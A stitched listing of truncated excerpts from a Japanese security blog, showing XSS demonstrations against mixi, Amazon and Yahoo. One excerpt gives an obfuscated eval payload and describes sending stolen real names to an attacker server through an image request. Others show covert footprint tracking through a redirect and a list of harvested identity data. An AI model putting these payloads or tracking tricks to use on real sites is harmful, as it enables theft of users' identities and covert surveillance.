XSS - 表示系パラメータに存在する盲点 :: ぼくはまちちゃん!
こんにちはこんにちは!! クロスサイトスクリプティングの時間です! XSSというと…! まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね! たとえばこんな感じのフォームから受け取ったパラメータを、 確認として表示するページとか! (入力) <form action="register.cgi" method="post"> タイトル:<input type="text" name="title"> ← 「ぼくはまちちゃん!」を入力 本文:<input type="text" name="body"> ← 「こんにちはこんにちは!!<script>alert(1)</script>」を入力 </form> (確認) <p>この内容で登録していい?</p> <p> タイトル: ぼくはまちちゃん!<br> 本文: こんにちはこんにちは!!<script>alert
mixi足あとちょうを、さらにバレにくくする :: ぼくはまちちゃん!
はまちや2さんの日記 mixi足あとちょうを、さらにバレにくくする2006/02/05 [15:53] (参考) mixi足あとちょう なんだか最近↑みたいに、自分のサイトのimgタグにmixiを指定して こっそり足あとを取るのが流行ってるらしい、って聞いたんですが!! 「わーぼくのサイトにもimgタグにmixi仕込んでみたいな~」 「けどバレちゃったら感じ悪いし…><」 なんて感じで二の足を踏んでいた人たちはいるかな! じゃあ、こんなふうにしてみればどうだろう…! かなりバレにくくなると思うよ! .htaccessとかに以下のように書いておく Redirect 302 /spacer.gif http://mixi.jp/show_friend.pl?id=609805 そしたら、htmlは↓みたいにするだけ! <img src="spacer.gif" width="1" height
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
俺専用mxxi :: ぼくはまちちゃん!
はまちや2さんの日記 mixiがクローキングしちゃってる Googleで「mixi」を検索してみました! すると、上からいくつかのところに「mixi(ミクシィ)モバイル」の文字がでてくるよね! うんうん…え、あれれ! 検索結果の要約のところに、しっかりとコンテンツの一部がでちゃってるよ! なんで! 続きはこちら [コメント:11件 トラックバック:2件] 2007/01/07 [23:39] コンパクトデジカメを買うための自分用メモ 最近おみせでよく見かける、手ぶれ補正とか高感度とかの コンパクトデジカメが 3万円を切ってきたんだよ! だから買おうと思うんだけど! 候補は 4機種…! せっかくだから色々しらべて検討したときのメモを置いておきますね! 続きはこちら [コメント:2件 トラックバック:0件] 2006/11/15 [20:28] XSS - 表示系パラメータに存在する盲点 こ
きみのサイトに被はてブ数 :: ぼくはまちちゃん!
はてなブックマークおもしろいよね! ところで、ぼく、はてなブックマークで一番使うシンボル(?)って [B!] でも [↑B] でもなく [108 users] だと思うんだけど! だから自分のサイトで users が表示できるやつをつくってみたよ!! → ひてブ(js) v0.2 (ダウンロード) どんな感じかは、サンプルページをみてね! つかいかたはこうだよ! 1. まずは prototype.js をダウンロードして、自分のサイトに転送しておこうか! 2. そしてさっきの hihate_v01.zip の中の nuluerer.cgi を、きみのサイト上に置いてパーミッションの設定だ! chmod 755 nuluerer.cgi 3. つぎに使いたいページの <head> の中に以下のように記述してね! <script type="text/javascript" src="prot
mixiがクローキングしちゃってる :: ぼくはまちちゃん!
Googleで「mixi」を検索してみました! すると、上からいくつかのところに「mixi(ミクシィ)モバイル」の文字がでてくるよね! うんうん…え、あれれ! 検索結果の要約のところに、しっかりとコンテンツの一部がでちゃってるよ! なんで! たしか http://m.mixi.jp/ って、PCで見にいっても このページへは携帯電話からのみアクセスできます。 パソコンのサイトはこちら なんて出るだけだったと思うんだけど…! なのになんで Google は中身を取得できてるの! ちなみにこのmixiモバイルって、 User Agent を 「DoCoMo/2.0 SH903i(c100;TB;W30H20)」 に変更したくらいでは 中身をみせてもらえません>< IPアドレスで制限してるのかな…! ふしぎふしぎ!どうなってるのこれって思って、User Agent を「google」に変更して
予告 :: ぼくはまちちゃん!
はまちやさん、また伝説を作るのですね さすが、かっこいい、天才 素敵! 私も期待してます。わくわくどきどき
超mixi足あとちょうについて :: ぼくはまちちゃん!
こんにちはこんにちは!! 現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ! きみのMIXI ID: きみのpostkey: きみのメールアドレス: ※mixiの修正が4回入って、現在は非表示 きみのブラウザ: きみのホスト名: リンク元: (おまけ4) きみのYahoo ID: (おまけ5) きみのHatena ID: (おまけ2) きみのlivedoor ID: (おまけ6) きみのGoogleアカウント: (おまけ3) きみのなまえ(amazon): (おまけ7) きみの好みのタイプ: (おまけ1) きみのクリップボードの中身 ところで、超mixi足あとちょうの追記にも書いたけれど、 「hamachiya.com を見にいかなければ大丈夫」で 思考停止するのって一番危険なんじゃないかな、と思うんだけど…! ここをみている一部の方々は、たぶ
mixiミュージック - 消えたアーティスト :: ぼくはまちちゃん!
↓これ、ぼくのお気に入りのアーティスト「はまちや2」さん (わー同じ名前!) (クリックで拡大画像) インディーズっていうのかな。 マイナーな割には結構コアなファンがいたりして、 自分と同じように、よく iTunes なんかで聴いているひともいてたみたい! だから mixiミュージックでも視聴回数が、ぶっちぎりの 442回! ランキングでも、かなり上位にいたと思うよ! だけど… さっき、なにげなく mixiミュージックのランキングを見てみたら… (クリックで拡大画像) 消えてる>< どこにもいなくなってる>< あれれ「上位 98件」って! アーティスト「はまちや2」さんの曲が、ちょうど2曲消えちゃってるんだけど…! ( 「ぼくはまちちゃん!」って曲と、「こんにちはこんにちは!!」って曲だよ ) わーなんでいなくなってるのーって思って、 アーティスト「はまちや2」さんのページを確認してみたら
Yahoo! Bookmarksは画期的な便利さだ!!! :: ぼくはまちちゃん!
はまちや2さんの日記 Yahoo! Bookmarksは画期的な便利さだ!!!2006/01/20 [16:50] ぼく普段からYahooなんて、せいぜい天気とか、たまにヤフオク見に行ったりするくらいで、 実はあまり知らなかったんだよ。 で、昨日 CSSXSSでYahoo!IDゲット みたいなこと書いたし、 他にどんなサービスがあるのかなぁと思って、ちょっと見にいってみたんだ。 そしたら「Yahoo! Bookmarks」なんてサービスがあるじゃん! さっそく使ってみたよ!! … うわなにこれ画期的!!!! やふー天才!?!?!?!?! ↓Yahoo! Bookmarksの天才なところ ・ふつうだと利用者が気に入ったページをブックマークするのに対し、 ・Yahooのは、サイト管理者が閲覧者のブックマークに追加できる! 斬新すぎwww 興味あるひとは、ものは試しに Yahoo! にログインし
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
